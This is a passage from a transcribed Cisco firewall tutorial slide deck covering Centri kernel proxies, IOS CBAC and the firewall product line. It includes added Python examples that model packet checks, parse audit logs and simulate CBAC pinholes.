    Kernel Proxy Sample Native Stack Data Flow

    Figure: the same components as on the previous slide, showing the path from the untrusted network adapter (205.50.50.2) through the external protocol stack, the security verification engine and the Centri virtual adapter (10.0.0.2) into the native Microsoft NT TCP/IP stack, Winsock and the Winsock applications (e.g., Web, DNS, mail servers) running on the firewall itself; the trusted network adapter is 10.0.0.1.

    Site-Based Model

  • 8/13/2019 Cisco - Internet Firewall Technology Tutorial

    76/90

    77

    0999_03F8_c2

    NW98_US_407

Policy enforcement occurs when information passes between sites (intersite), not within the same site (intrasite)

Rules are checked when information leaves one site for another

Install creates two sites, trusted and Internet, which may be expanded upon post-install (e.g., adding an isolated service network [DMZ])

The local stack is tied by a virtual wire to a trusted site

Figure: policy rules are checked on the paths between the Trusted, Internet and Isolated Service Network sites.

Eight Kernel Proxies

IP: source/destination checks, ping-of-death prevention, IP spoof prevention

ICMP: message type

TCP: port check, SYN flood prevention

UDP: port check

SMTP: nested routing blocking, minimal protocol set (similar to Mail Guard)

FTP: inline user authentication, non-transparent proxy mode, allowed action checks

Telnet: inline user authentication, non-transparent proxy mode, port check

HTTP: inline user authentication, URL filtering, Java/ActiveX/JavaScript blocking, allowed action checks
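The IP proxy's three checks from the table above, written out as an added example for this page (not Centri code) in Python: a minimal packet record with the fields the checks need, a trusted-site address range of 10.0.0.0/8 taken from the figure addressing (an assumption), and a check_ip function that does the source/destination sanity check, adapter-based spoof prevention, and the fragment arithmetic that stops a ping of death before reassembly. The TCP/UDP port checks and SYN-flood limiting are not modelled.

```python
import ipaddress
from dataclasses import dataclass

# Added example, not Centri code. Models the IP proxy's checks over a minimal
# packet record; the trusted address range is taken from the figure addressing
# (10.0.0.0/8) and is an assumption.

TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]
MAX_DATAGRAM = 65535          # largest IPv4 datagram the total-length field can express
IP_HEADER_LEN = 20            # minimum header; used when sizing the reassembled datagram


@dataclass(frozen=True)
class IpPacket:
    iface: str            # adapter the packet arrived on: "trusted" or "untrusted"
    src: str
    dst: str
    proto: str            # "icmp", "tcp", "udp"
    frag_offset: int = 0  # fragment offset in 8-byte units, as carried in the IP header
    payload_len: int = 0  # bytes of data carried by this fragment


def is_trusted_addr(addr):
    return any(addr in net for net in TRUSTED_NETS)


def check_ip(pkt):
    """Apply the IP proxy's checks; returns (verdict, reason), verdict 'accept' or 'drop'."""
    src = ipaddress.ip_address(pkt.src)
    dst = ipaddress.ip_address(pkt.dst)

    # Source/destination checks: addresses that cannot legitimately originate a
    # packet, and src == dst, which is the Land attack pattern.
    if src.is_loopback or src.is_multicast or src.is_unspecified or src == dst:
        return "drop", "invalid source/destination address"

    # IP spoof prevention: the adapter a packet arrives on must agree with its
    # source address. Trusted-site sources may only appear on the trusted adapter,
    # and everything on the trusted adapter must carry a trusted-site source.
    if pkt.iface == "untrusted" and is_trusted_addr(src):
        return "drop", "trusted-site source address on untrusted adapter"
    if pkt.iface == "trusted" and not is_trusted_addr(src):
        return "drop", "foreign source address on trusted adapter"

    # Ping-of-death prevention: a fragment lands at offset*8; if the datagram it
    # would reassemble into exceeds 65535 bytes, drop it before the stack ever
    # tries to reassemble it.
    if IP_HEADER_LEN + pkt.frag_offset * 8 + pkt.payload_len > MAX_DATAGRAM:
        return "drop", "fragment would reassemble past the maximum datagram size"

    return "accept", "ok"


def filter_packets(packets):
    """Run every packet through check_ip and return the verdicts in order."""
    return [check_ip(p) for p in packets]


if __name__ == "__main__":
    # Constructed traffic: a normal ping, a spoofed inside address from outside,
    # a Land-style packet and the oversized final fragment of a ping of death.
    sample = [
        IpPacket("untrusted", "198.51.100.7", "10.0.0.2", "icmp", 0, 56),
        IpPacket("untrusted", "10.0.0.9", "10.0.0.2", "tcp", 0, 40),
        IpPacket("untrusted", "10.0.0.2", "10.0.0.2", "tcp", 0, 40),
        IpPacket("untrusted", "198.51.100.7", "10.0.0.2", "icmp", 8100, 740),
    ]
    for pkt, (verdict, reason) in zip(sample, filter_packets(sample)):
        print(f"{pkt.iface:9} {pkt.src:>14} -> {pkt.dst:<10} {verdict:6} {reason}")
```

The fragment test is the one that matters for ping of death: offset 8100 places the fragment at byte 64800, so 740 bytes of data plus a 20-byte header would reassemble to 65560 bytes, beyond what the length field can describe, while 700 bytes at the same offset still fits.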

    Centri Summary


High-performance Kernel Proxy firewall

Uses four breakthroughs in firewall user interface design:

Natural network views

Bundled applications

Policy builder

Drag-and-drop policy deployment

Integrates well into a Microsoft environment: policies based on NT domains, groups, and users

Cisco IOS

Integrated security is not a new concept

Existing Cisco IOS security technologies support:

Perimeter security and access control

Identification and user authentication

Denial of service (DoS) protection

Virtual private networking

Reporting

Existing Cisco IOS Perimeter Security Technologies

Access control lists

Network address translation (NAT)

VPN technologies: authentication, network-layer encryption, tunneling (GRE, L2F), peer router

Policy-based multi-interface support

Event logging

TACACS+/RADIUS authentication

Lock-and-key security

Cisco IOS Firewall Feature Set: Enhanced Security for the Intelligent Internet

Context-Based Access Control (CBAC): secure, per-application filtering

Support for advanced protocols (H.323, SQL*Net, RealAudio, etc.)

Control downloading of Java applets

Denial of service detection and prevention

Real-time alerts

TCP/UDP transaction log

Configuration and management

Enhanced Security for the Intelligent Internet: Benefits...

Integrated solution: access and security

No new hardware required: one box to manage

Full routing functionality

Applicable for Internet, intranet and extranet security

Full Cisco IOS software interoperability: customers can leverage their knowledge of Cisco IOS software

Low cost of implementation and ownership for the Cisco installed base

Context-Based Access Control (CBAC)

Tracks the state and context of network connections to secure traffic flow

Inspects data coming into or leaving the router

Allows connections to be established by temporarily opening ports based on payload inspection

Return packets are authorized for that particular connection only, via a temporary ACL entry

Context-Based Access Control (CBAC) Application Support

Transparent support for common TCP/UDP Internet services, including WWW, Telnet, SNMP, finger, etc.

FTP

TFTP

SMTP

Java blocking

BSD R-cmds

Oracle SQL*Net

Remote-procedure call (RPC)

Multimedia applications: VDOnet's VDO Live, RealNetworks' RealAudio, Intel's Internet Video Phone (H.323), Microsoft's NetMeeting (H.323), Xing Technology's StreamWorks, White Pine's CU-SeeMe

IOS Firewall Transaction Log

Provides an audit trail for tracking transactions

Recognition of session and port

Information is sortable via tag

Sample:

Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33192) sent 22 bytes responder (172.166.129.11:25) sent 208 bytes

Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33194) sent 336 bytes responder (172.166.129.11:25) sent 325 bytes
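An added example (not from the slides or from Cisco) that turns the audit trail above into something sortable: a Python parser for %FW-6-SESS_AUDIT_TRAIL lines that records each session, totals traffic per responder and port, and picks out sessions in which the initiator pushed unusually many bytes. The embedded log is constructed from the two slide lines plus three made-up lines (a large push to the mail server, a UDP DNS session, and an unrelated syslog message the parser must skip); the regular expression's tolerance for "--" and "session:" wording and the upload threshold are this example's assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: the two lines from the slide, plus three lines made up for
# this example. Lines 3 and 4 use the "--" separator of later IOS releases so the
# parser is shown handling both spellings.
SAMPLE_LOG = """\
Sep 10 13:02:19 sifi-5 124: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33192) sent 22 bytes responder (172.166.129.11:25) sent 208 bytes
Sep 10 13:07:33 sifi-5 125: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.13:33194) sent 336 bytes responder (172.166.129.11:25) sent 325 bytes
Sep 10 13:09:01 sifi-5 126: %FW-6-SESS_AUDIT_TRAIL: tcp session initiator (172.166.1.40:1043) sent 51200 bytes -- responder (172.166.129.11:25) sent 180 bytes
Sep 10 13:09:45 sifi-5 127: %FW-6-SESS_AUDIT_TRAIL: udp session initiator (172.166.1.40:1044) sent 64 bytes -- responder (172.166.129.53:53) sent 180 bytes
Sep 10 13:10:02 sifi-5 128: %SYS-5-CONFIG_I: Configured from console by vty0
"""

# Pattern written against the slide's sample. The optional leading word (e.g. "Stop"),
# the optional colon after "session" and the optional "--" are assumptions that let
# it also accept the wording of later IOS releases.
AUDIT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<seq>\d+): "
    r"%FW-6-SESS_AUDIT_TRAIL: (?:\w+ )?(?P<proto>tcp|udp|icmp) session:? initiator "
    r"\((?P<i_ip>[\d.]+):(?P<i_port>\d+)\) sent (?P<i_bytes>\d+) bytes(?: --)? "
    r"responder \((?P<r_ip>[\d.]+):(?P<r_port>\d+)\) sent (?P<r_bytes>\d+) bytes"
)


@dataclass(frozen=True)
class Session:
    seq: int
    timestamp: str
    proto: str
    initiator: str
    initiator_port: int
    initiator_bytes: int
    responder: str
    responder_port: int
    responder_bytes: int


def parse_audit_trail(text):
    """Return one Session per SESS_AUDIT_TRAIL line; other syslog lines are skipped."""
    sessions = []
    for line in text.splitlines():
        m = AUDIT_RE.match(line.strip())
        if not m:
            continue
        sessions.append(Session(
            seq=int(m["seq"]), timestamp=m["ts"], proto=m["proto"],
            initiator=m["i_ip"], initiator_port=int(m["i_port"]),
            initiator_bytes=int(m["i_bytes"]),
            responder=m["r_ip"], responder_port=int(m["r_port"]),
            responder_bytes=int(m["r_bytes"])))
    return sessions


def bytes_by_service(sessions):
    """Totals per (responder, port): (session count, initiator bytes, responder bytes)."""
    totals = defaultdict(lambda: [0, 0, 0])
    for s in sessions:
        t = totals[(s.responder, s.responder_port)]
        t[0] += 1
        t[1] += s.initiator_bytes
        t[2] += s.responder_bytes
    return {k: tuple(v) for k, v in totals.items()}


def large_uploads(sessions, threshold):
    """Sessions in which the initiator sent more than `threshold` bytes, largest first.
    The threshold is a constructed triage knob, not an IOS feature."""
    hits = [s for s in sessions if s.initiator_bytes > threshold]
    return sorted(hits, key=lambda s: s.initiator_bytes, reverse=True)


if __name__ == "__main__":
    sessions = parse_audit_trail(SAMPLE_LOG)
    for (host, port), (n, up, down) in sorted(bytes_by_service(sessions).items()):
        print(f"{host}:{port:<5} sessions={n} initiator_bytes={up} responder_bytes={down}")
    for s in large_uploads(sessions, 10000):
        print(f"large upload: seq {s.seq} {s.initiator}:{s.initiator_port} -> "
              f"{s.responder}:{s.responder_port} {s.initiator_bytes} bytes")
```

Keying on the responder side is what makes the trail useful as an audit record: the same SMTP server appears once with its session count and byte totals regardless of how many ephemeral client ports talked to it, and the per-session byte counts single out the one 50 KB push among otherwise tiny mail exchanges.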

    Sample Configuration


! Inspection rule set "pri-net": generic TCP and UDP inspection plus
! application-aware inspection for the listed protocols
ip inspect name pri-net tcp
ip inspect name pri-net udp
ip inspect name pri-net ftp
ip inspect name pri-net h323
ip inspect name pri-net realaudio
ip inspect name pri-net streamworks
ip inspect name pri-net vdolive
ip inspect name pri-net cuseeme
! HTTP inspection: Java applets are allowed only from hosts permitted by access-list 10
ip inspect name pri-net http java-list 10
!
! e0 faces the protected network: traffic entering from the inside is inspected,
! and access-list 101 blocks everything returning toward the inside unless
! inspection has added a temporary entry for an established session
interface e0
 ip inspect pri-net in
 ip access-group 101 out
!
access-list 10 permit 172.34.7.130
access-list 101 deny ip any any
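To show what the CBAC description on the earlier slides and the configuration above mean in practice, here is an added Python model (not Cisco code) of that behaviour: a packet entering e0 from the inside creates a temporary return-path entry in front of access-list 101, an FTP PORT command seen by payload inspection opens a second entry for the data connection the server will initiate, the entries disappear when the session closes, and an HTTP reply carrying a Java class file is dropped unless the server is in access-list 10. The port-to-protocol mapping, the Java magic-number test, and the check that PORT names the client's own address are this example's assumptions.

```python
from dataclasses import dataclass, field

# Added example, not Cisco code: a model of the CBAC behaviour the slides describe,
# wired to the sample configuration. Protocol names, the Java magic-number check and
# the PORT-address check are this example's assumptions.

JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"   # first four bytes of a Java .class file

PERMIT = "permit"
DENY_ACL = "deny: access-list 101"
DENY_JAVA = "deny: java applet from host not in java-list 10"
NOT_INSPECTED = "not inspected: no return entry created"


@dataclass(frozen=True)
class Packet:
    proto: str            # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes = b""


def application(pkt):
    """Map a flow to the inspect-rule name CBAC would apply (assumed port mapping)."""
    if pkt.proto == "tcp" and pkt.dport == 21:
        return "ftp"
    if pkt.proto == "tcp" and pkt.dport == 80:
        return "http"
    return pkt.proto                  # generic tcp / udp inspection


@dataclass
class Cbac:
    inspected: set                    # names from the "ip inspect name pri-net ..." lines
    java_list: set                    # hosts permitted by access-list 10
    # temporary return-path permits, keyed by the inbound 5-tuple they allow
    pinholes: dict = field(default_factory=dict)

    def outbound(self, pkt):
        """Packet entering e0 from the inside: 'ip inspect pri-net in'."""
        app = application(pkt)
        if pkt.proto not in self.inspected and app not in self.inspected:
            return NOT_INSPECTED
        # Return traffic for this connection is authorised through access-list 101
        # by a temporary entry that exists only while the session does.
        self.pinholes[(pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)] = app
        if app == "ftp" and "ftp" in self.inspected:
            self._inspect_ftp(pkt)
        return PERMIT

    def _inspect_ftp(self, pkt):
        """Payload inspection: an active-mode PORT command opens a second pinhole
        for the data connection the server will initiate from port 20."""
        text = pkt.payload.decode("ascii", "replace").strip()
        if not text.upper().startswith("PORT "):
            return
        try:
            h1, h2, h3, h4, p1, p2 = (int(x) for x in text[5:].split(","))
        except ValueError:
            return                    # malformed command: open nothing
        addr = f"{h1}.{h2}.{h3}.{h4}"
        if addr != pkt.src:           # FTP bounce guard: only the client's own address
            return
        self.pinholes[("tcp", pkt.dst, 20, addr, p1 * 256 + p2)] = "ftp-data"

    def inbound(self, pkt):
        """Packet leaving e0 toward the inside: 'ip access-group 101 out' plus
        whatever temporary entries inspection has placed in front of it."""
        key = (pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport)
        app = self.pinholes.get(key)
        if app is None:
            return DENY_ACL           # access-list 101 deny ip any any
        if app == "http" and pkt.payload.startswith(JAVA_CLASS_MAGIC) \
                and pkt.src not in self.java_list:
            return DENY_JAVA          # 'http java-list 10': applets only from friendly hosts
        return PERMIT

    def close(self, pkt):
        """Session teardown removes the temporary entry (outbound 5-tuple given)."""
        self.pinholes.pop((pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport), None)


def demo():
    """Walk the sample configuration through a few constructed flows; returns verdicts."""
    fw = Cbac(inspected={"tcp", "udp", "ftp", "http"}, java_list={"172.34.7.130"})
    web = Packet("tcp", "10.1.1.5", 1025, "203.0.113.9", 80)
    ftp = Packet("tcp", "10.1.1.5", 1030, "203.0.113.20", 21, b"PORT 10,1,1,5,4,10\r\n")
    v = {
        "unsolicited inbound": fw.inbound(Packet("tcp", "203.0.113.9", 4444, "10.1.1.5", 23)),
        "outbound http": fw.outbound(web),
        "http reply": fw.inbound(Packet("tcp", "203.0.113.9", 80, "10.1.1.5", 1025, b"HTTP/1.0 200 OK")),
        "applet from unknown host": fw.inbound(Packet("tcp", "203.0.113.9", 80, "10.1.1.5", 1025, JAVA_CLASS_MAGIC)),
        "outbound ftp PORT": fw.outbound(ftp),
        "ftp-data from server:20": fw.inbound(Packet("tcp", "203.0.113.20", 20, "10.1.1.5", 1034)),
        "ftp-data to wrong port": fw.inbound(Packet("tcp", "203.0.113.20", 20, "10.1.1.5", 1035)),
    }
    fw.close(web)
    v["http reply after close"] = fw.inbound(Packet("tcp", "203.0.113.9", 80, "10.1.1.5", 1025))
    return v


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:26} {verdict}")
```

Two details are worth noticing. Generic "tcp" inspection alone would still open the return path for the control connection but would never parse PORT, so the data connection from server port 20 would be denied by access-list 101; that is why the configuration lists ftp separately. And the address check on PORT keeps a compromised or malicious client from using the firewall to open a pinhole toward some other inside host.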

    CFMI


Common security management for enterprise infrastructure

Centralized visual policy development, management, and enforcement

Adaptive configuration of network infrastructure

Integrates existing and future authentication technologies and Cisco firewall technologies

Support for scalable configuration of IPsec and IKE technologies

Physical network representation

Cisco's Firewall Family

Cisco IOS Firewall feature set: advanced, rich security option for Cisco IOS software, with full routing and WAN access capabilities, that integrates seamlessly with existing Cisco IOS software-based environments

Centri Firewall: high-performance, flexible, Windows NT-based security software with intuitive user-based policy rules. Easy to install, configure, and manage

PIX Firewall: highest-performance, scalable, dedicated security appliance with the most advanced features and application support, and fault tolerance

References

www.cisco.com/univercd/cc/td/doc/product/software/ios112/112cg_cr/2cbook/2cacclst.htm
Describes access lists and lock-and-key

www.cisco.com/warp/public/701/31.html
Increasing security on IP networks

www.cisco.com/warp/public/707/4.html
Strategies to protect against TCP SYN DoS attacks

www.cisco.com/univercd/cc/td/doc/product/software/ios113ed/113t/113t_3/firewall.htm
Cisco IOS Firewall feature set docs

www.cisco.com/warp/public/458/41.html
NAT FAQ